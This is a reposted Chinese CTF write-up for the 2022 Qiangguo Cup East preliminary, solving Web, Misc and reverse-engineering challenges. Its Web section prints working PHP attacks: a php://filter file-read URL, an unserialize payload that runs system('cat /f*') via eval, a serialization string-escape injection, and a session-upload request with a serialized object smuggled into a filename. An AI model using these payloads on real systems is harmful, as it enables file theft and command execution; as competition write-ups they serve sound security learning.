CTF导航 CTF导航

2022强国杯东部 初赛CTF-WriteUp

WriteUp 2年前 (2022) admin
755 0 0

秀米社团

JOIN US ▶▶▶

招新

EDI安全的CTF战队经常参与各大CTF比赛,了解CTF赛事。

欢迎各位师傅加入EDI,大家一起打CTF,一起进步。

诚招re crypto pwn misc方向的师傅)有意向的师傅请联系邮箱[email protected][email protected](带上自己的简历,简历内容包括但不限于就读学校、个人ID、擅长技术方向、历史参与比赛成绩等等。

点击蓝字 ·  关注我们

01

Web

1

md5_php
GET /?md5=0e215962017 HTTP/1.1Host: 39.106.153.217:46975Cache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: close
http://39.106.153.217:46975/le.php?file=php://filter/convert.base64-encode/index/resource=flag

2

命令执行
https://www.xiaohongyan.cn/articles/2022/04/27/1651046661350.html
2022强国杯东部 初赛CTF-WriteUp


2022强国杯东部 初赛CTF-WriteUp


3

反序列化
<?phpclass main{    protected $ClassObj;
    function __construct(){        $this->ClassObj = new evil();    }}// class easy{//     function action(){//         echo "hello Hacker";//     }// }class evil{    private $file= 'system("cat /f*");';    function action(){        eval($this->file);    }}$a = new main();echo urlencode(serialize($a));http://101.200.32.152:16798/?a=O%3A4%3A%22main%22%3A1%3A%7Bs%3A11%3A%22%00%2A%00ClassObj%22%3BO%3A4%3A%22evil%22%3A1%3A%7Bs%3A10%3A%22%00evil%00file%22%3Bs%3A18%3A%22system%28%22cat+%2Ff%2A%22%29%3B%22%3B%7D%7D

2022强国杯东部 初赛CTF-WriteUp

4

phpti

php自增

<?phperror_reporting(0);highlight_string(file_get_contents('sessionti1.php'));class a{    public $uname;    public $password;    public function __construct($uname,$password){        $this->uname=$uname;        $this->password=$password;    }    public function __wakeup(){        if($this->password==='admin')        {        highlight_string(file_get_contents('flag.php'));            include('flag.php');        }        else        {            echo 'hacker !!!';        }    }}
function filter($string){    return str_replace('phpinfo()','phpinfo()up',$string);}
$uname=$_GET["admin"];$password=123456;$ser=filter(serialize(new a($uname,$password)));var_dump($ser);// $ser=filter(serialize(new a($uname,$password)));// $test=unserialize($ser);?> 
<!-- O:1:"a":2:{s:5:"uname";s:1:"?";s:8:"password";s:5:"admin";}  -->1=phpinfo()phpinfo()phpinfo()phpinfo()phpinfo()phpinfo()phpinfo()phpinfo()phpinfo()phpinfo()phpinfo()phpinfo()phpinfo()phpinfo()phpinfo()";s:8:"password";s:5:"admin";}http://39.107.81.36:45787/sessionti1.php?admin=phpinfo()phpinfo()phpinfo()phpinfo()phpinfo()phpinfo()phpinfo()phpinfo()phpinfo()phpinfo()phpinfo()phpinfo()phpinfo()phpinfo()phpinfo()%22;s:8:%22password%22;s:5:%22admin%22;}https://www.jb51.net/article/241817.htmhttps://blog.csdn.net/bmth666/article/details/104737025
<form action="http://39.107.81.36:45787/flag.php" method="POST" enctype="multipart/form-data">    <input type="hidden" name="PHP_SESSION_UPLOAD_PROGRESS" value="123" />    <input type="file" name="file" />    <input type="submit" /></form>POST /flag.php HTTP/1.1Host: 39.107.81.36:45787User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:83.1) Gecko/20100101 Firefox/83.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateContent-Type: multipart/form-data; boundary=---------------------------169043664136240902353881690649Content-Length: 500Origin: nullConnection: closeCookie: PHPSESSID=ufikfl87kj719o80l9nfrhd2fqUpgrade-Insecure-Requests: 1X-Forwarded-For: 127.0.0.1X-Originating-IP: 127.0.0.1X-Remote-IP: 127.0.0.1X-Remote-Addr: 127.0.0.1-----------------------------169043664136240902353881690649Content-Disposition: form-data; name="PHP_SESSION_UPLOAD_PROGRESS"
123-----------------------------169043664136240902353881690649Content-Disposition: form-data; name="file"; filename="|O:5:"admin":1:{s:4:"root";s:36:"print_r(scandir(dirname(__FILE__)));";}"Content-Type: image/png塒NG

02

Misc

1

不要被迷惑

binwalk拿到zip,然后爆破密码 jjdecode解密

2022强国杯东部 初赛CTF-WriteUp

2

PCAP文件分析

09.pacapng

分离flag.zip 和09.png 09.png为zip密码 解密后

crc段出现问题,修改文件高看到flag

2022强国杯东部 初赛CTF-WriteUp

2022强国杯东部 初赛CTF-WriteUp

3

平正开

还原zip , zip伪加密

dd = open('12.zip','wb')f1 = open('flag44c099db1.zip','rb')for l in f1.read():    if l == 0:        dd.write(bytes([0x0]))    else:        dd.write(bytes([0x100-l]))dd.close()
然后 http://www.hiencode.com/cvencode.html 解码

2022强国杯东部 初赛CTF-WriteUp

03

Re

1

re2
反编译exe后反编译pyc文件
2022强国杯东部 初赛CTF-WriteUp
分数达到1000就是flag
2022强国杯东部 初赛CTF-WriteUp
score = 0 后直接吐出flag

2022强国杯东部 初赛CTF-WriteUp


EDI安全

2022强国杯东部 初赛CTF-WriteUp

扫二维码|关注我们

一个专注渗透实战经验分享的公众号



原文始发于微信公众号(EDI安全):2022强国杯东部 初赛CTF-WriteUp

版权声明:admin 发表于 2022年10月17日 下午4:27。
转载请注明:2022强国杯东部 初赛CTF-WriteUp | CTF导航

相关文章

PKU GeekGame 2022 题解
admin
651
ångstromCTF Writeup by VP-Union
admin
204
GoogleCTF + zer0ptsCTF + ImaginaryCTF 2023 筆記
admin
274
【WP】2022年春秋杯春季赛Misc、Crypto类题目解析
admin
1,669
DataCon2023软件安全赛道,冠军战队WP分享
admin
70
第七届 强网杯 全国网络安全挑战赛 Web Writeup
admin
380

暂无评论

您必须登录才能参与评论!
立即登录
暂无评论...

相关文章

2024 能源网络安全大赛预赛 【金盾检测】
0
官网WP!DASCTF X GFCTF 2024
0
腾讯游戏安全大赛2024决赛题解
0
vctf apples leak libc操作复现(高版本libc overlapping)
0
腾讯游戏安全大赛2024初赛题解
0
基于cpu_entry_area利用的Linux内核权限提升
0
第二届数据安全大赛暨首届“数信杯”东部赛区writeup
0
第二届数据安全大赛暨首届“数信杯”数据安全大赛数据安全积分争夺赛预赛南区- WriteUp By EDISEC
0
HackPack(LLM挑战)Writeup
0
春秋云镜-Initial打靶记录
0